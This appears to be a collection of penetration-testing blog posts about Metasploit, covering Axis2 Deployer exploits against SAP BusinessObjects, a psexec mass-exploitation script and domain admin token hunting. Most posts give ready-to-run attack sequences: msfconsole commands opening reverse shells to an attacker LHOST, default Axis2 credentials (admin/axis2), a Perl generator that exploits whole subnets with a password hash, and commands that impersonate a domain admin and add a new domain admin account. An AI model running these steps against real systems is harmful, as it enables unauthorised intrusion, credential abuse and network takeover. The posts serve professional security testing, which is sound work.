Axis2 Deployer via REST

Update 12/06: Many kudos to Egypt for helping with exploit dev!

Last weekend at OWASP BASC 2010, I created another version of the Axis2 Deployer exploit which uses REST instead of SOAP. This is important because pentesters may need to exploit Axis2 via REST, since SOAP may be disabled in certain environments. This module will not work against SAP BusinessObjects since the dswsbobje.war module has the REST interface disabled by default. I have tested the module against Axis2 1.5.2.

The REST version of Axis2 Deployer Exploit module can be found here.

In essence this module adds more flexibility for everyone that is a pentesting an environment with Axis2.

Example usage:

use exploit/multi/http/axis2_deployer_rest
set PATH /axis2
set RHOST 192.168.33.128
set payload java/shell/reverse_tcp
set target 0
set LHOST 192.168.33.1
set LPORT 13337
exploit -j


Enjoy!

Regards,
Jabra

Advertisement

Axis2 Deployer via SOAP

At OWASP AppSecDC @willis__ and I talked about several attacks against SAP BusinessObjects. SAP BusinessObjects uses a module known as dswsbobje.war to deploy the Axis2 interface. Axis2 is a web application interface for administering web services. The dswsbobje module deploys several SAP BusinessObjects web services. These web services allow for anyone that is using BusinessObjects to build integration with other systems in their environment. The problem is that SAP did not remove the functionality which would prevent a malicious attacker or XSS’ed admin from deploying a malicious web service. Worse yet is that they also left the Axis2 interface configured with default credentials and then they went ahead and forgot to mention this fact in their 1000+ pages administration guide. Perfect storm. “What’s the worst that could happen….?”

Axis2 and SAP’s dswsbobje module both use the default credentials to login to the web interface (admin / axis2). Metasploit already has a module to test for default Axis2 credentials.

We can use this against SAP BusinessObjects by using the following msfconsole commands:

use auxiliary/scanner/http/axis_login
set URI /dswsbobje/axis2-admin/login
set USERNAME admin
set PASSWORD axis2
set RHOSTS 192.168.33.128
run


After we have identified a target that has default Axis2 credentials, we can utilize these credentials to login and deploy a new malicious web service. The way this works is that Axis2 Deployer module creates a new web service (jar), uploads the web service by using the default Axis2 credentials and then makes a SOAP request to execute meterpreter.

The Axis2 Deployer Exploit module have been added to Metasploit svn so that anyone that runs into Axis2 in the future will be able to easily exploit the system. The Metasploit module uses the java/meterpreter or java/shell payloads.

Here is an example of using the Axis2 Deployer exploit module against SAP BusinessObjects:

use exploit/multi/http/axis2_deployer
set PATH /dswsbobje
set RHOST 192.168.33.128
set payload java/meterpreter/reverse_tcp
set target 0
set LHOST 192.168.33.1
set LPORT 13337
exploit -j

For those running BusinessObjects SAP has provided a “fix” on their website (this site requires authentication).

For Axis2 that only difference is that the PATH is set to /axis2.

use exploit/multi/http/axis2_deployer
set PATH /axis2
set RHOST 192.168.33.128
set payload java/shell/reverse_tcp
set target 0
set LHOST 192.168.33.1
set LPORT 13337
exploit -j


It’s important to keep in-mind is that java/meterpreter is not the same as windows/meterpreter and therefore has several limitations which make it less than ideal for anyone that is performing a penetration assessment. To get around this limitation, we can use the spawn_meterpreter script.


use exploit/multi/http/axis2_deployer
set PATH /dswsbobje
set RHOST 192.168.33.128
set payload windows/shell/reverse_payload
set AutoRunScript spawn_meterpreter
set target 0
set LHOST 192.168.33.1
set LPORT 13337
exploit -j


This script will cause Metasploit to execute a new instance of meterpreter automatically after the first session is opened.

Regards,
Jabra

MetasploitExpress::Parser

Update: I have already uploaded the module to CPAN. The module can be found at: http://search.cpan.org/~jabra/MetasploitExpress-Parser/lib/MetasploitExpress/Parser.pod

In Vegas I ran into the developer of Seccubus at one of the speaker parties. We talked about the things were are currently working on (Fierce v2, Automation, etc). After a few minutes, he told me about his planned to improve Seccubus to be able to leverage many different tools in a single interface. After re-freshing my memory that Seccubus is also written in Perl, I thought, … well why not add Metasploit Express interation… Well, since you are reading the post I’m sure you can guess what happened.. I coded for around 4 hours at Defcon and MetasploitExpress::Parser was ready before his presentation on sunday.

Here is an example of using MetasploitExpress::Parser:

my $msf = new MetatsploitExpress::Parser;

my $parser = $msf->parse_file(‘test1.xml’);
#a MetasploitExpress::Parser Object

my @hosts = $parser->get_all_hosts();
#an Array of MetasploitExpress::Parser::Host Objects

my @services = $parser->get_all_services();
#an Array of MetasploitExpress::Parser::Service Objects

my @tasks = $parser->get_all_tasks();
#an Array of MetasploitExpress::Parser::Task Objects

my @events = $parser->get_all_events();
#an Array of MetasploitExpress::Parser::Event Objects

my @reports = $parser->get_all_reports();
#an Array of MetasploitExpress::Parser::Report Objects

Abstract:

Security Maturity

The maturity of an information security program can be judged by various
factors. The most important of which is understanding the environment, the
goals of the organization and teams/roles that are involved. This presentation
will discuss methods that can used to determine the state of an organizations
security program and ways to improve it in the future. Building a mature
security program doesn’t happen over night, however constant improvement over a
period of time will lead to a strong security program.

We will cover a few key concepts that are important for organizations that are
building strong security programs. The concepts we will cover include:
internal/external security assessments, web application development and risk
management.

BIO:

Joshua “Jabra” Abraham joined Rapid7 in 2006 as a Security Consultant. Josh has  extensive IT Security and Auditing experience and worked as an enterprise risk assessment analyst for Hasbro Corporation. Josh specializes in penetration testing, web application security assessments, wireless security assessments, and custom code development. He has spoken at BlackHat, DefCon, ShmooCon, SANs Pentest Summit, Infosec World, CSI, OWASP Conferences, LinuxWorld, Comdex and BLUG. In his spare time, he contributes code to open source security projects such as the BackTrack LiveCD, BeEF, Nikto, Fierce, and PBNJ. He is frequently quoted in the media regarding Microsoft Patch Tuesday and web application security by ComputerWorld, DarkReading and SC Magazine.

Metasploit PSEXEC scanner (via Perl)

(01/14/09) Update: I built a psexec.pl script that can be found here.

Metasploit’s pexec module is one of my favorite modules. It does exactly what I need and it does it really well. One thing I wish that Metasploit had, is a scanner version of the psexec exploit module. So I decided to build my own with Perl.

Okay, assume we have the following networks: 192.168.1.0/24, 192.168.2.0/24 etc etc… We know the local admin account is Administrator and the hash for the account is ADMINISTRATOR:HASH.

First, we build a small Perl script to generate a configuration file:


#!/usr/bin/perl -w
use strict;
print "use windows/smb/psexec\n";
print "set SMBUser Administrator\n";
print "set SMBPass ADMINISTRATOR:HASH\n";
print "set PAYLOAD windows/meterpreter/bind_tcp\n";
# first range
foreach(1.. 254) {
    print "set RHOST 192.168.1.$_\n";
    print "exploit\n";
    print "sleep 2\n";
}
# second range
foreach(1.. 254) {
    print "set RHOST 192.168.2.$_\n";
    print "exploit\n";
    print "sleep 2\n";
}


Once we have this script built, we simply execute it and save the result to a file named psexec.rc.

perl psexec-192-168.pl > psexec.rc


Lastly, we leverage Metasploit’s ability to execute commands passed into meterpreter via an resource file. Once Metasploit loads psexc.rc, it will execute all of the commands we generated using the Perl script. This basically gives us a nice way to create an exploit scanner.

msfconsole -r psexec.rc

Loading psexec.rc will exploit all of the systems within the networks specified and the result will be tons and tons of shells.

Regards,
Jabra

Hunting for Domain Admin Tokens

Penetration Assessments are a focused effort to accomplish one or more goals within a limited timeframe. It is often helpful to automate tasks to put time on your side. This is where a penetration tester who can code, really excels! Less time is wasted on mundane tasks. Automation is always key. Automating the tasks that should be automated. It is clear that there are specific tasks that can’t/shouldn’t be automated, but that is a topic for another post.

One nice example I have seen during several on-site assessments, is the need to find a machine with a Domain Admin’s token on it. The token can be impersonated to compromise the network. Finding the token can takes hours of manually work. I mentioned this to HD Moore he added a plugin to Metasploit that automates this process. To use this new functionality, we start by exploiting a ton of Windows boxes using meterpreter as the payload.

Next, we need to build a list of users that are within the Domain Admins groups. This list can be generated using:
net groups "Domain Admins" /domain

Example of the file:
COMPANY\joe-admin
COMPANY\bill-admin
COMPANY\david-admin

We then need to load the token_hunter module in Metasploit and execute it. The token_hunt_user script will tell us which sessions contain a Domain Admin token.
msf> load token_hunter
msf> token_hunt_user -f /tmp/domain-admin.txt

To achieve Domain Admin privileges, we need to connect to a session that contained a Domain Admin token.
msf> sessions -i [session-with-domain-admin-token]

Once connected to the session, we then impersonate the Domain Admin and spawn cmd.exe with the admin’s privileges.
meterpreter> impersonate_token 'COMPANY\joe-admin'
meterpreter> execute -f cmd.exe -H -c -i -t

Lastly, we add a new account to the domain and add the account into the Domain Admins group.
C:\net user hack0r h4ck0r) /add /domain
C:\net group "Domain Admins" hack0r /add /domain

Enjoy it and Pwn dem v0hns!

Regards,
Jabra

Build a collage of your next pentest

Here is some code I wrote recently that will take a screenshot of all active metasploit sessions:

http://spl0it.org/files/patches/metasploit/screenshoter.rb

To leverage this code just copy the file into the plugins directory of metasploit v3. Then open up msfconsole and exploit several systems….

Finally, load the plugin and run the screenshot_all_sessions command:
msf> load screenshoter
msf> screenshot_all_sessions

All screenshots will be saved to disk. I have included the IP address in the filename to make things easier for data correlation.

Happy Holidays! Ph33r!

-Jabra

Metasploit 3.3 Released!

HD Moore and the entire Metasploit team have released Metasploit v3.3! I’m really excited to start using this new release as it provides tons of new features including: 123 new exploits, 117 new auxiliary modules, support for Vista and Windows 7, improved stability of Meterpreter, all applicable exploits now have OSVDB references, Meterpreter with colors and much much more! More details be be found within the Release Notes.

Download Metasploit v3.3 here

Enjoy Metasploit v3.3!